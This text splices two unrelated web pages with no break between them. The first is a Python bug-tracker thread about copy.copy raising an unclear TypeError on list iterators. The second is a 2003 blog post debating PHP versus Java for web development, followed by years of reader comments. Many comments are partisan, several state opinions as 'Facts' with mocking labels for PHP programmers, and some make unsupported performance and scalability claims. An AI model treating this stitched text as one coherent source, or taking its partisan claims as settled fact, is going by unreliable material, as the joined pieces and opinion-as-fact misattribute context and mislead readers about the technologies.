Posted by mack on April 11, 2012 at 06:59 AM MDT # | http://raibledesigns.com/rd/entry/php_vs_java_which_is | crawl-003 | refinedweb | 6,447 | 67.79 |
Building an engaging video calling app can be simple if you build it on a secure and robust communication platform such as EnableX. In this tutorial, you'll learn how to add group calling functionality to your Flutter app.
Prerequisites
Before we start, let's make sure you have the following in your development environment:
For IOS
Flutter 2.0.0 or later
macOS
Xcode (Latest version recommended)
Note: You need an iOS device
For Android
Flutter 2.0.0 or later
macOS or Windows
Android Studio (Latest version recommended)
Note : You can either use Android simulator or an Android device
Cautions
Please run flutter doctor to check if the development environment and the deployment environment are correct.
Get an EnableX Account
Please sign up for an account with us. It's absolutely free! Once done, create a Project, get the necessary credentials, and you are ready to start!
- Create a project
- Get the App ID and App Key. Please refer here on how to get the ID and Key
To avoid confusion, you might be interested to know some of the common classes we use.
EnxRtc: This class features a versatile method for developers to connect to a room and successfully publish a stream into it. To start using EnableX, an object must be created using the EnxRtc constructor.
EnxRoom: The EnxRoom is a class derived from EnxRtc. It handles all room-related functions used to communicate with EnableX, e.g. connection of endpoints to an EnableX room, publishing and subscribing of streams, etc.
EnxStream: The EnxStream is a class derived from EnxRtc. It handles all media-stream-related functions to initiate, configure and transport streams to EnableX media servers. It is also used for receiving stream endpoints to be played.
EnxPlayerView: Used to display a video stream in an EnxPlayerView.
Let’s Get Started
Create A Flutter Project
Now that we have all things set up, you are ready to build a group video calling app. First, you need to start creating a new Flutter project
You may use Visual Studio Code to create a Flutter project. Do install the Flutter plugin in Visual Studio Code. See Set up an editor. Once done, please follow the steps below:
- Select the Flutter: New Project command in View > Command Palette. Enter the project name and press Enter.
- Select the location of the project in the pop-up window. Visual Studio Code automatically generates a simple project.
Alternatively, you may also use Android Studio to create a Flutter project. Do install the Flutter plugin in Android Studio. See Set up an editor. Once done, please follow the step below
- Click on File and select New -> New Flutter Project -> Flutter Application
Add Dependencies
Now, pls add the following dependencies in pubspec.yaml based on the following steps:
- Add the enx_flutter_plugin dependency to integrate EnableX Flutter SDK.
See for the latest version of enx_flutter_plugin.
environment:
  sdk: ">=2.7.0 <3.0.0"

dependencies:
  flutter:
    sdk: flutter
  # The following adds the Cupertino Icons font to your application.
  # Use with the CupertinoIcons class for iOS style icons.
  cupertino_icons: ^0.1.3
  # Please use the latest version of enx_flutter_plugin
  enx_flutter_plugin: ^1.8.0
  permission_handler: ^3.0.0
Install it. You can install packages from the command line with Flutter:
$ flutter pub get
Alternatively, your editor might support flutter pub get.
Check the docs from your editor to learn more.
Generate Access Token
Every user is required to use an Access Token, unique to them, to connect to a room. This step is usually done via a REST API call.
Do use the following link to create a token and roomId.
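The token itself should be created server-side with your App ID and App Key, not inside the Flutter app. As a language-neutral illustration (written in Java here), the sketch below only assembles the pieces such a server call needs: the HTTP Basic-auth header and a minimal JSON body. The endpoint path and the body field names are assumptions for illustration; check the EnableX Server API reference for the real ones.

```java
import java.nio.charset.StandardCharsets;
import java.util.Base64;

public class TokenRequestSketch {

    // EnableX server APIs authenticate with HTTP Basic auth derived from
    // the project's App ID and App Key.
    static String basicAuthHeader(String appId, String appKey) {
        String raw = appId + ":" + appKey;
        return "Basic " + Base64.getEncoder()
                .encodeToString(raw.getBytes(StandardCharsets.UTF_8));
    }

    // Minimal token-request body. The field names (name/role/user_ref)
    // are assumptions; verify them against the Server API docs.
    static String tokenRequestBody(String name, String role, String userRef) {
        return String.format("{\"name\":\"%s\",\"role\":\"%s\",\"user_ref\":\"%s\"}",
                name, role, userRef);
    }

    public static void main(String[] args) {
        System.out.println("Authorization: " + basicAuthHeader("my-app-id", "my-app-key"));
        // Placeholder path -- the real token endpoint is documented by EnableX.
        System.out.println("POST /v1/rooms/{roomId}/tokens");
        System.out.println(tokenRequestBody("flutter-user", "participant", "1234"));
    }
}
```

The string returned for the token by your server is what gets passed to EnxRtc.joinRoom() later in this tutorial.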
Get Device Permission
EnableX Video SDK requires camera and microphone permission to start a video call. Simply follow the following steps to create device permission.
Add the standard camera, microphone and internet permissions to your AndroidManifest.xml:

<uses-permission android:name="android.permission.CAMERA" />
<uses-permission android:name="android.permission.RECORD_AUDIO" />
<uses-permission android:name="android.permission.INTERNET" />
IOS
Open the info.plist and add:
Privacy – Microphone Usage Description, and a note in the Value column.
Privacy – Camera Usage Description, and a note in the Value column.
Note
Your application will be able to have a voice call if the Background Mode is enabled. To enable Background Mode, simply following the following steps:
Select the app target in Xcode,
Click the Capabilities tab to enable Background Modes, and check on Audio, AirPlay, and Picture in Picture.
Handle Errors
iOS Black Screen
Our SDK uses PlatformView; you should set io.flutter.embedded_views_preview to YES in your Info.plist.
Start Video Calling
We are almost there! Now that we have all the setup and permission handling done, let’s declare some variables needed to manage the state of the call
Import Packages
import 'package:enx_flutter_plugin/enx_flutter_plugin.dart';
import 'package:flutter/material.dart';
import 'package:permission_handler/permission_handler.dart';
Define VideoConferenceScreen Class
class VideoConferenceScreen extends StatefulWidget {
  @override
  _VideoConferenceScreenState createState() => _VideoConferenceScreenState();
}
Define App States
class _VideoConferenceScreenState extends State<VideoConferenceScreen> {
  static String token = "";

  @override
  void initState() {
    super.initState();
    initPlatformState();
    initEnxRtc();
  }

  // Initialize the permission handler
  Future initPlatformState() async {
    // Get microphone and camera permission
    await PermissionHandler().requestPermissions(
      [PermissionGroup.microphone, PermissionGroup.camera],
    );
  }
// Initialize EnxRtc

  Future initEnxRtc() async {
    // map2 holds assumed video-size constraints (placeholder values).
    Map<String, dynamic> map2 = {
      'minWidth': 320,
      'minHeight': 180,
      'maxWidth': 1280,
      'maxHeight': 720
    };
    Map<String, dynamic> map1 = {
      'audio': true,
      'video': true,
      'data': true,
      'framerate': 30,
      'maxVideoBW': 1500,
      'minVideoBW': 150,
      'audioMuted': false,
      'videoMuted': false,
      'name': 'flutter',
      'videoSize': map2
    };
    await EnxRtc.joinRoom(widget.token, map1, null, null);
  }
// Add EnxRtc handler callbacks

  void _addEnxrtcEventHandlers() {
    EnxRtc.onRoomConnected = (Map<dynamic, dynamic> map) {
      setState(() {
        print('onRoomConnectedFlutter' + jsonEncode(map));
      });
      EnxRtc.publish();
    };
    EnxRtc.onPublishedStream = (Map<dynamic, dynamic> map) {
      setState(() {
        print('onPublishedStream' + jsonEncode(map));
        EnxRtc.setupVideo(0, 0, true, 300, 200);
      });
    };
    EnxRtc.onStreamAdded = (Map<dynamic, dynamic> map) {
      print('onStreamAdded' + jsonEncode(map));
      print('onStreamAdded Id' + map['streamId']);
      String streamId;
      setState(() {
        streamId = map['streamId'];
      });
      EnxRtc.subscribe(streamId);
    };
    EnxRtc.onActiveTalkerList = (Map<dynamic, dynamic> map) {
      print('onActiveTalkerList ' + map.toString());
      final items = (map['activeList'] as List)
          .map((i) => new ActiveListModel.fromJson(i));
      if (_remoteUsers.length > 0) {
        for (int i = 0; i < _remoteUsers.length; i++) {
          setState(() {
            _remoteUsers.removeAt(i);
          });
        }
      }
      if (items.length > 0) {
        for (final item in items) {
          if (!_remoteUsers.contains(item.streamId)) {
            print('_remoteUsers ' + map.toString());
            setState(() {
              _remoteUsers.add(item.streamId);
            });
          }
        }
        print(_remoteUsers);
      }
    };
    EnxRtc.onUserConnected = (Map<dynamic, dynamic> map) {
      setState(() {
        print('onUserConnected' + jsonEncode(map));
      });
    };
  }
Run The Project
Finally, let's run the project!
- Run the following command in the root folder to install dependencies.
flutter packages get
- Run the project
flutter run
Hurray! Now you have a working video calling app. With this app, your users can connect to a room to publish their stream and subscribe to remote streams.
In case you want to find out more, visit the EnableX Developer Hub or the GitHub repository.
The post How To Build Video Calling App Using Flutter and EnableX appeared first on EnableX Insights.
Discussion (2)
thanks for sharing
Writing Client/Server WebSocket Application using Scala
Today I will explain how to quickly write a WebSocket application in Scala. I will show how easy it is to write both the client and server side. For the client I will use the wCS library, and for the server I will use Atmosphere's WebSocket framework. If you expect something complex, don't read this blog!
OK, let's write a really simple application which echoes messages received to all connected clients. Messages can be initiated by the client or by the server itself. In order to achieve that, we will use the Atmosphere Framework. If you aren't familiar with Atmosphere, take a look at this introduction. What we need to define is a Scala class that will be invoked by the framework when a WebSocket message is received. With Atmosphere, it is as simple as:
import javax.ws.rs.{POST, Path}
import org.atmosphere.annotation.Broadcast

@Path("/")
class Echo {

  /**
   * Broadcast/Publish the WebSocket messages to all connected WebSocket clients.
   */
  @POST
  @Broadcast
  def echo(echo: String): String = {
    echo
  }
}
The echo method will be invoked with a String argument that represents a WebSocket message. The message will be distributed using an Atmosphere Broadcaster, which can be seen as a bi-directional channel of communication between clients and the server. Looking for more code? Well, with Atmosphere you don't need more on the server side, as the framework takes care of the WebSocket handshake and all the protocol details you don't want to spend time on.
Now on the client side, let’s use the wCS library (Asynchronous I/O WebSocket Client for Scala). First, let’s open a connection to the server
val w = new WebSocket
w.open("ws://127.0.0.1/")
Once the WebSocket connection is established, we can send messages (as Strings or bytes).
w.send("foo")
To receive WebSocket messages, all we need to do is to pass a Listener that will be invoked when the server echoes messages
w.listener(new TextListener() {
  override def onMessage(s: String) {
    // Do something with the message
  }
})
We can switch at any moment between Strings and bytes, and associate as many Listeners as we want. Note that the library is fully asynchronous, so the send operation never blocks. We can fluidly write the code above by just doing:
val w = new WebSocket
w.listener(new TextListener() {
  override def onOpen() {
    // do something
  }
  override def onMessage(message: String) {
    // do something
  }
  override def onClose() {
    // do something
  }
}).open("ws://127.0.0.1").send("foo")
That’s all. You just wrote your first WebSocket client/server application using Scala! For more information, ping me on Twitter!
Thanks for this little tutorial
As of now, my "Shipping Cost" calculator works, but runs in an infinite loop. Here's how I'd like the program to behave, if possible: prompt the user for the Weight and the Distance 13 times; then, AFTER the 13 prompts for user input of weight & distance, display the weight, the distance, and the cost to ship the item for each of their inputs, ideally on 13 separate lines. Here's the current code as it is, in an infinite loop. The driver is below.
Ex:
//User prompts x 13
Weight: #.##
Distance: ###.#
Weight: ##
Distance: ##
.
.
.
//Report x 13
Weight: #.## Distance: ###.# Cost: ##.#
Weight: ## Distance: ## Cost: ##.#
.
.
.
public class ShippingCharges {

    private double weight;
    private double shippingDistance;

    // class declarations
    public ShippingCharges() {
    }

    // mutators and accessors (setters and getters)
    public ShippingCharges(double weight, double shippingDistance) {
        this.weight = weight;
        this.shippingDistance = shippingDistance;
    }

    public double getShippingDistance() {
        return shippingDistance;
    }

    public void setShippingDistance(double shippingDistance) {
        this.shippingDistance = shippingDistance;
    }

    public double getWeight() {
        return weight;
    }

    public void setWeight(double weight) {
        this.weight = weight;
    }

    public double getShippingCharges() {
        // Determines the rate by setting numPer500 = (distance/500.25), rounds up
        double numPer500 = (double) ((int) (shippingDistance / 500.25) + 1);

        // series of if statements to determine the shipping charges
        if (shippingDistance == 0)
            return 0.00 * numPer500;
        if (weight == 0)
            return 0.00 * numPer500;
        if (weight <= 2)
            return 1.10 * numPer500;
        if (weight > 2 && weight <= 6)
            return 2.20 * numPer500;
        if (weight > 6 && weight <= 10)
            return 3.70 * numPer500;
        if (weight > 10)
            return 4.80 * numPer500;
        return 0;
    }

    // API - toString: "This object, (which is already a string!), is itself returned."
    public String toString() {
        return "Weight of package=" + weight + "kg. Shipping distance=" + shippingDistance
                + "km. Cost to send the package is $" + getShippingCharges();
    }
}
DRIVER
import java.util.Scanner;          // import Scanner class
import java.text.NumberFormat;     // NumberFormat class to help parse numbers
import java.text.DecimalFormat;    // DecimalFormat class to help format decimals

public class TesterShippingCharges {

    public static void main(String[] args) {
        NumberFormat formatter = new DecimalFormat("#0.00");
        ShippingCharges num = new ShippingCharges();   // num finds out the multiplication
        Scanner scanner = new Scanner(System.in);      // factor for the price
        ShippingCharges scan = new ShippingCharges();

        while (true) {                                 // Causes infinite loop
            System.out.print("Weight of package: ");   // to continue prompting user.
            double weight = scanner.nextDouble();      // Retrieves user's input weight
            num.setWeight(weight);                     // and sets equal to weight.

            System.out.print("Distance to be sent: "); // Prompts user for distance
            double distance = scanner.nextDouble();    // Retrieves user's input distance
            num.setShippingDistance(distance);         // and sets equal to distance

            scan.setWeight(weight);
            scan.setShippingDistance(distance);
            num.getShippingCharges();
            System.out.println(scan);

            if (weight == 10000)
                break;
        }
    }
}
Thanks for reading! Thanks even more if you could help with a fix!
This post has been edited by MemoryLeak2013: 15 July 2010 - 02:20 PM | http://www.dreamincode.net/forums/topic/181721-print-a-report-after-instead-of-case-by-case/ | CC-MAIN-2018-17 | refinedweb | 439 | 53.58 |
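Not an authoritative fix, but one way to get the behavior described in the question is to split the driver into two phases: gather all thirteen weight/distance pairs first, then print one report line per pair. The sketch below hard-codes three sample pairs in place of the thirteen Scanner prompts so it runs without input, and copies the rate brackets from getShippingCharges():

```java
import java.util.Locale;

public class ShippingReportSketch {

    // Same rate logic as ShippingCharges.getShippingCharges():
    // one bracket rate, multiplied once per started 500.25 km.
    static double charge(double weight, double distance) {
        if (weight == 0 || distance == 0) return 0.0;
        double numPer500 = (int) (distance / 500.25) + 1;
        double rate;
        if (weight <= 2)       rate = 1.10;
        else if (weight <= 6)  rate = 2.20;
        else if (weight <= 10) rate = 3.70;
        else                   rate = 4.80;
        return rate * numPer500;
    }

    public static void main(String[] args) {
        // Phase 1: collect the inputs. In the real driver this would be a
        // for-loop of 13 Scanner prompts filling these arrays.
        double[] weights   = {1.5, 8.0, 12.0};
        double[] distances = {100.0, 600.0, 1200.0};

        // Phase 2: after ALL input is gathered, print the report,
        // one line per entry.
        for (int i = 0; i < weights.length; i++) {
            System.out.printf(Locale.US, "Weight: %.2f Distance: %.1f Cost: %.2f%n",
                    weights[i], distances[i], charge(weights[i], distances[i]));
        }
    }
}
```

With Scanner, phase 1 becomes a `for (int i = 0; i < 13; i++)` loop that fills `weights[i]` and `distances[i]`, and the `while (true)` / `weight == 10000` sentinel goes away entirely.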
- NAME
- VERSION
- DESCRIPTION
- OVERVIEW
- METHODS
- ATTRIBUTES
- AUTHOR
- CONTRIBUTOR
NAME
WWW::AdventCalendar - a calendar for a month of articles (on the web)
VERSION
version 1.112
DESCRIPTION
This is a library for producing Advent calendar websites. In other words, it makes four things:
a page saying "first door opens in X days" the calendar starts
a calendar page on and after the calendar starts
a page for each day in the month with an article
an Atom feed
This library was originally written just for RJBS's Perl Advent Calendar, so it assumed you'd always be publishing from Dec 1 to Dec 24 or so. It has recently been retooled to work across arbitrary ranges, as long as they're within one month. This feature isn't well tested. Neither is the rest of the code, to be perfectly honest, though...
OVERVIEW
To build an Advent calendar:
create an advent.ini configuration file
write articles and put them in a directory
schedule advcal to run nightly
advent.ini is easy to produce. Here's the one used for the original RJBS Advent Calendar:
title = RJBS Advent Calendar
year = 2009
uri =
editor = Ricardo Signes

category = Perl
category = RJBS

article_dir = rjbs/articles
share_dir = share
These should all be self-explanatory. Only
category can be provided more than once, and is used for the category listing in the Atom feed.
These settings all correspond to the calendar attributes described in "ATTRIBUTES" below. A few settings below are not given above.
Articles are easy, too. They're just files in the
article_dir. They begin with an email-like set of headers, followed by a body written in Pod. For example, here's the beginning of the first article in the original calendar:
Title: Built in Our Workshop, Delivered in Your Package
Topic: Sub::Exporter

=head1 Exporting

In Perl, we organize our subroutines (and other stuff) into
namespaces called packages. This makes it easy to avoid having
to think of unique names for
The two headers seen above, title and topic, are the only headers required, and correspond to those attributes in the WWW::AdventCalendar::Article object created from the article file.
Finally, running advcal is easy, too. Here is its usage:
Options given on the command line override those loaded from configuration. By running this program every day, we cause the calendar to be rebuilt, adding any new articles that have become available.
METHODS
build
$calendar->build;
This method does all the work: it reads in the articles, decides how many to show, writes out the rendered pages, the index, and the atom feed.
read_articles
my $article = $calendar->read_articles;
This method reads in all the articles for the calendar and returns a hashref. The keys are dates (in the format
YYYY-MM-DD) and the values are WWW::AdventCalendar::Article objects.
ATTRIBUTES
- title
The title of the calendar, to be used in headers, the feed, and so on.
- tagline
A tagline for the calendar, used in some templates. Optional.
- uri
The base URI of the calendar, including trailing slash.
- editor
The name of the calendar's editor, used in the feed.
- default_author

The name of the calendar's default author, used for articles that provide none.
- year
The calendar year. Optional, if you provide start_date and end_date.
- start_date
The start of the article-containing period. Defaults to Dec 1 of the year.
- end_date
The end of the article-containing period. Defaults to Dec 24 of the year.
- categories
An arrayref of category names for use in the feed.
- article_dir
The directory in which articles can be found, with names like YYYY-MM-DD.html.
- share_dir

The directory for templates, stylesheets, and other static content.
- output_dir
The directory into which output files will be written.
- today
The date to treat as "today" when deciding how much of the calendar to publish.
- tracker_id
A Google Analytics tracker id. If given, each page will include analytics.
AUTHOR
Ricardo SIGNES <[email protected]>
CONTRIBUTOR
Len Jaffe <[email protected]>
COPYRIGHT AND LICENSE

This software is copyright (c) 2015 by Ricardo SIGNES.
This is free software; you can redistribute it and/or modify it under the same terms as the Perl 5 programming language system itself. | https://metacpan.org/pod/WWW::AdventCalendar | CC-MAIN-2016-07 | refinedweb | 690 | 57.06 |
Created on 2014-09-19 19:00 by seberg, last changed 2015-02-01 14:28 by skrah. This issue is now closed.
In NumPy we decided some time ago that if you have a multi dimensional buffer, shaped for example 1x10, then this buffer should be considered both C- and F-contiguous. Currently, some buffers which can be used validly in a contiguous fashion are rejected.
CPython does not support this currently, which may create a minor nuisance if/once we change it fully in NumPy; see for example
I have attached a patch which should (sorry, I did not test this at all yet) relax the checks as much as possible. I think this is right, but we caused some subtle breaks in user code (mostly Cython code) when we first tried changing it, and while NumPy arrays may be more prominently C/F-contiguous, compatibility issues with libraries checking for contiguity explicitly and then requesting a strided buffer are very possible.
If someone could give me a hint about adding tests, that would be great.
Also I would like to add a small note to the PEP in any case regarding this subtlety, in the hope that more code will take care about such subtleties.
There is another oddity: #12845. Does NumPy have a formal definition of array contiguity somewhere?
BTW, if you have NumPy installed and run test_buffer in Python3.3+,
numpy.ndarray has many tests against memoryview and _testbuffer.ndarray
(the latter is our exegesis of PEP-3118).
#12845 should be closed, seems like a bug in some old version. The definition now is simply that the array is contiguous if you can legally access it in a contiguous fashion. Which means first stride is itemsize, second is itemsize*shape[0] for Fortran, inverted for C-order.
To be clear, the important part here, is that to me all elements *can* be accessed using that scheme. It is not correct to assume that `stride[-1]` or `stride[0]` is actually equal to `itemsize`.
In other words, you have to be able to pass the pointer to the start of a c-contiguous array into some C-library that knows nothing about strides without any further thinking. The 0-strides badly violate that.
Thanks, #12845 is indeed fixed in NumPy.
Why does NumPy consider an array with a stride that will almost
certainly lead to undefined behavior (unless you compile with
-fwrapv) as valid?
In CPython we try to eliminate these kinds of issues (though
they may still be present).
>>> import numpy as np
>>> import io
>>> x = np.arange(10)
>>> y = np.array([x])
>>> print(y.strides)
(9223372036854775807, 8)
>>> y.flags
  C_CONTIGUOUS : True
  F_CONTIGUOUS : True
  OWNDATA : True
  WRITEABLE : True
  ALIGNED : True
  UPDATEIFCOPY : False
Well, the 9223372036854775807 is certainly no good for production code and we would never have it in a release version, it is just there currently to expose if there are more problems. However I don't care what happens on overflow (as long as it is not an error).
Note that the stride here is on a dimension with shape 1. The only valid index is thus always 0 and 0*9223372036854775807=0, so the stride value does not actually matter when calculating offsets into the array. You could simply set it to 80 to get something that would be considered C-contiguous or to 8 to get something that is considered F-contiguous. But both is the case in a way, so just "cleaning up" the strides does not actually get you all the way.
Ok, so it is a debug thing in the current NumPy sources.
IMO ultimately the getbufferproc needs to return valid strides, even
if the first value isn't used.
For that matter, the getbufferproc is free to translate the multi-dimensional corner case array to a one-dimensional array that is automatically C and F-contiguous.
Does it matter if you lose some (irrelevant?) information about
the original array structure?
An extra dimension is certainly not irrelevant! The strides *are* valid
and numpy currently actually commonly creates such arrays when slicing.
The question is whether or not we want to ignore them for contiguity
checks even if they have no effect on the memory layout.
So there are three options I currently see:
1. Python also generalizes like I would like numpy to end up in the
future (the current patch should do that) and just don't care about such
strides, because the actual memory layout is what matters.
2. We say it is either too dangerous (which may very well be) or you
want to preserve Fortran/C-order information even when it does not
matter to the memory layout.
This leads to this maybe:
2a) we just keep it as it is and live with minor inconsistencies (or
never do the relaxed strides in numpy)
2b) We let these buffers return False on checking for contiguity but
*allow* fetching a buffer when C-/F-contiguous is explicitly asked
for when getting the buffer. Which is a weird middle way, but it might
actually be a pretty sane solution (have to think about it).
I think it would help discussing your options if the patch passes test_buffer
first. Currently it segfaults because shape can be NULL. Also, code in
memoryobject.c relies on the fact that ndim==0 means contiguous.
Then, it would help enormously if you give Python function definitions of
the revised C and F-contiguity.
I mean something like verify_structure() from Lib/test/test_buffer.py -- that
function definition was largely supplied by Pauli Virtanen, but I may have
added the check for strides-is-multiple-of-itemsize (which 2**63-1 usually
isn't, so the new debug numpy strides don't pass that test).
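Stefan's request above invites exactly such a function. A rough sketch of what the relaxed definition could look like (editor's illustration of the rule discussed in this thread — not the code from the patch or from Lib/test/test_buffer.py): a stride is only constrained for dimensions whose extent is greater than one, and an empty buffer is always contiguous.

```python
def is_contiguous(shape, strides, itemsize, order='C'):
    """Relaxed contiguity check: strides only matter for dimensions
    of extent > 1; a buffer with a 0 in its shape holds no elements."""
    if 0 in shape:
        return True
    expected = itemsize
    dims = range(len(shape))
    # C order accumulates strides from the last dimension inward,
    # Fortran order from the first dimension outward.
    for i in (reversed(dims) if order == 'C' else dims):
        if shape[i] > 1 and strides[i] != expected:
            return False
        expected *= shape[i]
    return True
```

Under this rule a buffer of shape (1, 10) with strides (9223372036854775807, 8) passes both the C and the Fortran check, matching the NumPy session shown earlier in this issue, while shape=[1], strides=[-5] remains contiguous as already noted.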
I am very sorry. The attached patch fixes this (not sure if quite right, but if anything should be more general then necessary). One test fails, but it looks like exactly the intended change.
Thanks! I still have to review the patch in depth, but generally
I'm +1 now for relaxing the contiguity check.
Curiously enough the existing code already considered e.g. shape=[1], strides=[-5] as contiguous.
Since the functions in abstract.c have been committed by Travis Oliphant:
Could there have been a reason why the {shape=[1], strides=[-5]}
case was considered but the general case was not?
Or is it generally accepted among the numpy devs that not considering
the general case was just an oversight?
Yeah, the code does much the same as the old numpy code (at least most of the same funny little things, though I seem to remember the old numpy code had something yet a bit weirder, would have to check).
To be honest, I do not know. It isn't implausible that the original numpy code dates back 15 years or more to numeric. I doubt whoever originally wrote it thought much about it, but there may be some good reason, and there is the safety considerations that people use the strides in a way they should not, which may trip us here in any case.
Ok, here's my take on the situation:
1) As far as Python is concerned, shape[0] == 1 was already special-cased, so
people could not rely on canonical Fortran or C strides anyway.
2) Accessing an element via strides should be done using PyBuffer_GetPointer(),
which can of course handle non-canonical strides.
3) Breakage will only affect NumPy users, since practically no one else is
using multidimensional arrays.
Regarding your option 2b): I think it may be confusing, the buffer protocol
is already so complicated.
So, I think purity wins here. If you are sure that all future NumPy versions
will ship with precise contiguity checks, then I'll commit the new patch in 3.5 (earlier versions should not be changed IMO).
I've moved the checks for 0 in shape[i] to the beginning (len == 0). I hope
there are no applications that set len incorrectly, but they would be severely
broken anyway.
FWIW, I think it would be good to make this change early in the
3.5 release cycle, so issues can be found. Sebastian, do you
have an idea when the change will be decided in numpy?
Regarding the discussion here ...
... about the special stride marker:
In the case of slicing it would be nice to use the "organic" value
that would arise normally from computing the slice. That helps in checking other PEP-3118 implementations like Modules/_testbuffer.c
against numpy.
Numpy 1.9. was only released recently, so 1.10. might be a while. If no
problems show up during release or until then, we will likely switch it
by then. But that could end up being a year from now, so I am not sure
if 3.6 might not fit better. The problems should be mostly mitigated on
our side. So bug-wise it shouldn't be a big issue I would guess.
I will try to look at it more soon, but am completely overloaded at least for the next few days, and maybe some other numpy devs can chip in. Not sure I get your last point; slicing should give the "organic" values even for the mangled-up thing with relaxed strides on (currently)?!
Okay, the whole thing isn't that urgent either.
Sorry for the confusion w.r.t slicing: I misremembered what the
latest numpy version did:
a)
>>> x = np.array([[1,2,3,]])
>>> x.strides
(9223372036854775807, 8)
b)
>>> x = np.array([[1,2,3], [4,5,6]])[:1]
>>> x.strides
(24, 8)
Somehow I thought that case b) would also produce the special marker,
but it doesn't, so all is well.
Is this related to the NPY_RELAXED_STRIDES_CHECKING compilation flag?
@pitrou, yes of course. This would make python do the same thing as numpy does (currently only with that compile flag given).
About the time schedule, I think I will try to see if some other numpy dev has an opinion. Plus, should look into documenting it for the moment, so that someone who reads up on the buffer protocol should get things right.
Like Stefan I think this would be good to go in 3.5. The PyBuffer APIs are relatively new so there shouldn't be a lot of breakage.
Antoine, sounds good to me, I don't mind this being in python rather sooner then later, for NumPy itself it does not matter I think. I just wanted to warn that there were problems when we first tried to switch in NumPy, which, if I remember correctly, is now maybe 2 years ago (in a dev version), though.
New changeset 369300948f3f by Stefan Krah in branch 'default':
Issue #22445: PyBuffer_IsContiguous() now implements precise contiguity | https://bugs.python.org/issue22445 | CC-MAIN-2017-51 | refinedweb | 1,802 | 72.16 |
A whimsical “nugget”
If net present value (NPV) is inversely proportional to the discounting rate, then there must exist a discounting rate that makes NPV equal to zero.
The discounting rate that makes net present value equal to zero is called the “internal rate of return (IRR)” or “yield to maturity”.
To apply this concept to capital expenditure, simply replace “yield to maturity” by “IRR”, as the two terms mean the same thing. It is just that one is applied to financial securities (yield to maturity) and the other to capital expenditure (IRR).
To calculate IRR, make r the unknown and simply use the NPV formula again. The rate r is determined as follows:
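A reconstruction of the defining equation in standard notation — V₀ for the investment outlay (or present market value), Fₜ for the cash flow received in year t, and n for the final year; these are the usual textbook symbols, not necessarily this book's exact notation:

```latex
V_0 \;=\; \sum_{t=1}^{n} \frac{F_t}{(1+r)^{t}}
\qquad\Longleftrightarrow\qquad
\mathrm{NPV}(r) \;=\; -\,V_0 \;+\; \sum_{t=1}^{n} \frac{F_t}{(1+r)^{t}} \;=\; 0 .
```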
To use the same example from the previous chapter:
In other words, an investment's internal rate of return is the rate at which its market value is equal to the present value of the investment's future cash flows.
It is possible to use trial-and-error to determine IRR. This will result in an interest rate that gives a negative net present value and another that gives a positive net present value. These negative and positive values constitute a range of values which can be narrowed until the yield to maturity is found; in this case ...
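The trial-and-error narrowing described above is, in effect, bisection on the rate r. A small illustrative sketch in Python (editor's example with made-up cash flows, not the book's numbers):

```python
def npv(rate, cash_flows):
    """NPV of cash_flows[t] received at the end of year t (t = 0 is today)."""
    return sum(cf / (1 + rate) ** t for t, cf in enumerate(cash_flows))

def irr(cash_flows, lo=0.0, hi=1.0, tol=1e-9):
    """Bisect between a rate giving positive NPV (lo) and one giving
    negative NPV (hi) until the interval closes in on the IRR."""
    while hi - lo > tol:
        mid = (lo + hi) / 2
        if npv(mid, cash_flows) > 0:
            lo = mid   # NPV still positive: the discounting rate must rise
        else:
            hi = mid
    return (lo + hi) / 2

# Outlay of 100 today, returning 60 at the end of each of the next two years:
rate = irr([-100, 60, 60])   # about 13.1 %
```

Because NPV decreases monotonically in r for a conventional investment (an outflow followed by inflows), the bisection converges on the unique root inside the bracket.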
On Mon, Dec 1, 2008 at 8:29 AM, Jeff Law <[email protected]> wrote:
> Vladimir Makarov wrote:
>> The following patch solves a latent reload bug (in reload inheritance)
>> triggered by IRA.  It is a second version (less pessimistic in reload
>> inheritance optimization) of the patch
>>
>> The problem is described on
>>
>> The patch invalidates reg_last_reload_reg set in previous insns for
>> INC/DEC if reg_last_reload_reg set is not set for the current insn for
>> some reasons (e.g. the hard register is used in other insn reloads
>> besides reload for INC/DEC).
>>
>> The patch was tested on SH (with -m4 -ml -O3 -fomit-frame-pointer) and
>> successfully bootstrapped on itanium (another port using INC/DEC
>> heavily).
>>
>> Ok to commit?
>>
>> 2008-11-25  Vladimir Makarov  <[email protected]>
>>
>>     PR rtl-optimization/37514
>>     * reload1.c (reload_as_needed): Invalidate reg_last_reload
>>     from previous insns.
>>
> This is fine.  However, at this stage we should be more focused on the
> simpler, safer fix rather than picking up these uncommon
> micro-optimizations.
> Jeff

I need this patch.  Otherwise, bootstrap will fail on Linux/x86 with:

cc1: warnings being treated as errors
/net/gnu-6/export/gnu/src/gcc-ira/gcc/gcc/reload1.c: In function 'reload_as_needed':
/net/gnu-6/export/gnu/src/gcc-ira/gcc/gcc/reload1.c:4167: error: unused variable 'old_prev'

Index: ChangeLog.ira
===================================================================
--- ChangeLog.ira	(revision 142324)
+++ ChangeLog.ira	(working copy)
@@ -1,3 +1,8 @@
+2008-12-01  H.J. Lu  <[email protected]>
+
+	* reload1.c (reload_as_needed): Declare old_prev only if
+	AUTO_INC_DEC is defined.
+
 2008-12-01  Vladimir Makarov  <[email protected]>
 
 	PR rtl-optimization/37514

Index: reload1.c
===================================================================
--- reload1.c	(revision 142324)
+++ reload1.c	(working copy)
@@ -4164,7 +4164,9 @@ reload_as_needed (int live_known)
       rtx prev = 0;
       rtx insn = chain->insn;
       rtx old_next = NEXT_INSN (insn);
+#ifdef AUTO_INC_DEC
       rtx old_prev = PREV_INSN (insn);
+#endif
 
       /* If we pass a label, copy the offsets from the label information
	 into the current offsets of each elimination.  */

-- 
H.J.
There are many ways to find the square root of a number in Python.
1. Using Exponent Operator for Square Root of a Number
num = input("Please enter a number:\n")
sqrt = float(num) ** 0.5
print(f'{num} square root is {sqrt}')
Output:
Please enter a number:
4.344
4.344 square root is 2.0842264752180846
Please enter a number:
10
10 square root is 3.1622776601683795
I am using the float() built-in function to convert the user-entered string to a floating-point number. The input() function is used to get the user input from standard input.
2. Math sqrt() function for square root
The Python math module's sqrt() function is the recommended way to get the square root of a number.
import math

num = 10
num_sqrt = math.sqrt(num)
print(f'{num} square root is {num_sqrt}')
Output:
10 square root is 3.1622776601683795
3. Math pow() function for square root
It’s not a recommended approach. But, the square root of a number is the same as the power of 0.5.
>>> import math >>> >>> math.pow(10, 0.5) 3.1622776601683795 >>>
4. Square Root of Complex Number
We can use cmath module to get the square root of a complex number.
import cmath

c = 1 + 2j
c_sqrt = cmath.sqrt(c)
print(f'{c} square root is {c_sqrt}')
Output:
(1+2j) square root is (1.272019649514069+0.7861513777574233j)
5. Square Root of a Matrix / Multidimensional Array
